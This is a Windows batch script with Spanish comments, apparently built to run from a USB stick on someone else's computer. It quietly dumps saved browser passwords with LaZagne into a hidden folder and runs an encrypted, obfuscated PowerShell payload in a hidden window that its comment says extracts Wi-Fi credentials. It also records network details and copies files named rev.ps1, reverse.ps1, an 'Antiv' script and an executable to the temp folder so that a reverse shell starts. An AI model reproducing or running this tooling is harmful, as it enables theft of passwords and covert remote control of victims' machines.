@Echo off & Cls

:: Nombre de la Usb
Set USBLabel=HELLOWORLD

:: Carpeta que donde se guardará la informacion
Set CarpetaDestino=wPasswords

:: Opcion para ocultar la carpeta (SI/NO)
Set OcultarCarpetaDestino=SI

:: Ruta herramienta
Set BrowserPassword=Tools\Windows\laZagne.py

:: Carpeta dentro de la carpeta oculta
:: Formato: NOMBREPC-NOMBREUSUARIO
Set Destino=%CarpetaDestino%\%COMPUTERNAME%-%USERNAME%

:: Detectar la letra de nuestra usb
::For /F "Tokens=3 Delims= " %%A In ('Echo list volume ^| diskpart ^| findstr "%USBLabel%"') do (set USB=%%A:)
:: Is a nuestra usb
%USB%

:: Si no existe la carpeta la creamos
If Not Exist "%Destino%" Mkdir "%USB%\%Destino%"

:: Ocultar la carpeta en el caso de que hayamos puesto que si, luego podemos desocultarla con 'Attrib -s -h "NombreCarpeta"
If %OcultarCarpetaDestino%==SI ( Attrib +S +H "%CarpetaDestino%" )

:: Ejecutamos la herramienta y guardamos el resultado en nuestra carpeta destino
.\python\python.exe "%USB%\%BrowserPassword%" browsers -quiet -oN -output "%Destino%"


:: Ejecutamos script para sacar wifi
powerSHeLl  -NoPROf  -NOLoGo  -WInDoW  HiDDEn  -noNINteRaCTiV -C    "IEX (([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AFEAVwBPAEcAdABCADEAUABlAFQANgBsAG0AZgA4AHIAZABCAEYAZgBoAEEAPQA9AHwANQA0ADUAMgA2AGYAYgAzADMAYQBjAGMANABjADQAMwAxAGYAYgA2ADQAMwAxADkAOAA3ADEAZgBmADAAMwBiAGEANAAzAGIAMgAwAGEAYgA1ADAAYgBiADgAOQA1ADkAMABkADEAMABiAGIAZQBjAGEAZgBiAGUAMAAwADIAOAA2ADQAMgBiADkAMwAwADYAOAA3AGIAYwBlAGUAMgAwAGYAMwAzADkANwA2ADkANABlAGQAOABiADMAOAAyAGIAMwA3ADMANgBjAGIANgAyAGUANgBhAGQAMAA2ADIAOAA2ADYAZQBjAGMAYQAwAGIAZgBmADQAZgA0AGMANwA1AGQAOQBjAGIAYQBjADkAMwA3ADgANgA0ADUAZABjADMAYwAwADIAMQA0AGYANgA0ADEANgA2ADgANAA3ADYAYgA1AGUAMgBkADAANQBmADQAMwA3ADQANgBjADYANQBkAGMAZQAzADgAOAAwADIAOQBjAGEAMwA4AGEAMQBhAGEAZQBiADIANAAwADQAZQA1AGMAZQA5ADIAMgAyAGUANAA3AGEAOQBhADIANQAyADIAMAA3ADYAZAA0ADMANQBmADkAMwAwAGQAYwBlADgAMAA3AGEAOAA2ADYAMgAzADUANgA3ADgAZQA1ADgAMABlADAANAA1ADAAZQA4ADkAYQAwADYANQBjADIAMQAyAGYAMgBhADgAYwAzAGMAYgBmADcAMQBiADEAMQA2ADkAMwBiADgAYwBlADkAYQA5AGMANwBmAGYAMwA3ADEANgA0AGQAMgBmAGEAZAA4ADIAOQA5ADAAZQBmADkAMQA1AGIAZQAxAGMANwBmADQAOQAwADYAOQAyADYAOQBjADAAZAA1ADIANwAyADgAMQBhADAANgBhADgAMgBmAGEAOQA0AGYANgAzADkANQBiAGYANQA0AGYAMQA4ADkAYgA1ADgAZQA4AGYAMAA1ADEANAA1ADgAZgBkAGUAOABjAGUAYgBhADIAYQBlADcAOQAzADcAZAA4ADcAYQA3ADQAYQBkADQANgBmADUANQA2ADUAMQBhADMAZgA1ADIAMAA1ADQAZQBjADIAMwA0ADUANQAxADUAMQBlAGYANwBlAGQAOQBjADEAOQBiADcAZQBkADMAYgAyAGEANgA2ADQAZQAxADQANgAyAGQAMgAyADAAMAA5AGYAMwA2ADcAZgA0AGYANAA1AGYANQA1ADYANABkADQANABiAGQANABiADYANgA2AGIAYwA5AGYAZQAwAGQANAAwADQAMABjADgAZQAwAGYAMgA1ADgAMABmADEANAAyAGQANAAzAGYANwAyAGUAYQBhAGEAZgA5ADIAMwBiAGMANwBmADIANwBjAGYAMQBhADIAOQA5AGMAMABmADUAMQBjAGEAYgAyAGQAMAA2ADYAZQBmAGIAMQBiADIAMgA4ADEAOQAzAGEAMQBjAGUAZQBkADQAOAA5ADIANwA5AGYAOABlADAANwA1AGIAOQA3AGMANwA1AGMAYwAyADMAMQAzADcANgBmADIAZQA3ADYAMAAwAGMAYQBjAGUANgA0ADcAZABmADIANwA2AGYANAA2ADcAYgBhADEAZQBmADgAOQAzAGIAZABjADUANAAwAGIANAA2ADcAYQA4AGQANwA1ADEANQBkADAAMAA4ADIAZQAxADcAMwBlADgANAA2AGMANgAyADcANgA1ADEANABiAGUAMAAxAGYAMgAyAGYANwBlADMAYgBjADEANQBiADcAMwBhADkAMwBjADcAMgBiADIAZABkAGYAOABiADcAYQAzADEAZAA5AGEAMwAyAGEAYwAzAGIAYwBmADEAMQAyAGMAMQBmADMANwBjAGUANwA5ADYAMQBjADUAZQAxADcAYwAzADgAMAA3AGQAOAAwADAAZQBiADEAYgBmAGQANABhADIANQA5ADYAMwBmAGEANwAxAGMAZQBkADYANwBhAGYANQA0ADgAYgA0ADAANgA3ADEAOQBmAGYANQBlAGMAZgA3AGEAZQBiAGYAMAAyAGUANwBhADMANABjAGEAZgBiADIANgBhADUAMgAwAGIAZABmAGQANwBkAGMANQA0ADcANQA2AGMAOQAzADUAYwBlADgAZAA5ADkAMQBiADYAZQAwADQANQA3ADkAYQBkADUAMQBiADcANAA0ADUAMABmAGQAOABmADgAMwBhADYAOQA0ADUAMQA0ADcAYQA4AGMAYgA0AGUAZQAyADMAYgBmADUAMQA3ADgAMABlADAAYgAzADcANgBhAGUA' | ConvertTo-SecureString  -Key 105,148,35,18,23,245,121,10,133,139,170,223,228,71,246,137,199,55,103,71,43,239,46,128,92,255,158,133,20,107,72,10)))))"


::Ocultamos archivo

attrib +s +h "WLAN_Profiles.txt"

:: Archivo con ip-mac

ipconfig /all >> %Destino%\%username%.txt

:: Ejecución de script para empezar la reverse shell

copy scripts\hola.bat %temp% /Y| copy scripts\hola.vbs %temp% /Y | copy scripts\rev.ps1 %temp% /Y | copy scripts\reverse.ps1 %temp% /Y | copy scripts\letsbefriends.exe %temp% /Y | copy scripts\Antiv.bat %temp% /Y | copy  scripts\Principal.bat %temp% /Y

c:

cd %userprofile%\appdata\local\temp

letsbefriends.exe